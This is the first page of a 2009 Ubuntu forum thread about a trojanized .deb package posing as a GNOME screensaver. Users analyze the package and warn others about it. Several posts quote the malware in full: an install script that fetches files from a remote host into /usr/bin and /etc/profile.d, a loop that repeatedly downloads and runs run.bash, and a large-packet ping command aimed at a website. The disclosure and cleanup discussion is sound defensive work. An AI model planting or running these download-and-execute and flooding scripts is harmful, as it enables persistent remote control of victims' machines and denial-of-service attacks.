Page 1 of 15 12311 ... LastLast
Results 1 to 10 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #1
    Join Date
    Dec 2007
    Beans
    124

    Exclamation YOU THERE!! Malicios script installed as a DEB, please read!

    Hello guys Im going to make this breef

    I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

    after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    Im no expert but this looks just wrong!!

    I have removed the package however I i doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

    Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, Just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    Last edited by dmizer; December 9th, 2009 at 02:06 AM. Reason: removed hyperlinking to malitious urls

  2. #2
    Join Date
    Dec 2009
    Beans
    3

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Excuse my noobishness, but it appears that the DEB replace those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked though.

  3. #3
    Join Date
    Jul 2009
    Location
    Dayton Ohio USA
    Beans
    1,070
    Distro
    Ubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    What is the link(url) for this alleged screensaver
    Please not as hyper link but plain text.

  4. #4
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I;m not seeing it do much. for instance the bash replacement seems to just ping a site "mmowned.com " or some such.

  5. #5
    Join Date
    Dec 2007
    Location
    Gainesville, Florida
    Beans
    Hidden!
    Distro
    Xubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    This is the contents of the Auto.bash script.

    Code:
    while :
    do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
    done
    you may want to se if run.bash is running. if so kill it. And then remove it from /usr/bin/

    gnome.sh runs Auto.bash

    Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
    Last edited by pbrane; December 8th, 2009 at 08:54 PM.

  6. #6
    Join Date
    Jul 2007
    Beans
    414
    Distro
    Xubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit
    Ultimately this seems to be happening:
    ping -s 65507 www.mmowned.com
    which may happen everytime you log in - plus it seems designed to keep what it can run updated.

    There's a php file involved too, but I cannot figure out what part that has to play.

    I think you may have just been PWNED.

  7. #7
    Join Date
    Dec 2007
    Beans
    124

    Exclamation Re: YOU THERE!! Malicios script installed as a DEB, please read!

    OK guys please help me remove from gnome-look this file i have browsed the source codes and it contains something definatley malicious

    http://www.gnome-look.org/content/sh...content=116772

    please dont install it

    im working on contacting others who have installed it and redirecting them here to resolve the issue
    Last edited by conorsulli; December 9th, 2009 at 05:27 AM.

  8. #8
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    yes noticed this after further looking...

    gonna get this guy good

  9. #9
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
    Another day has passed and I'm just a little bit smarter.

  10. #10
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    No, you're right. Whatever goes into /etc/profile.d gets run everytime someone logs in. It then downloads another script and runs that. Right now, it is just
    ping -s 65507 www.mmowned.com

    which could at least be used to collect IP's, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at anytime, it could easily be used to use your computer to assist in a "Denial of Service" attack.

    I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

Page 1 of 15 12311 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •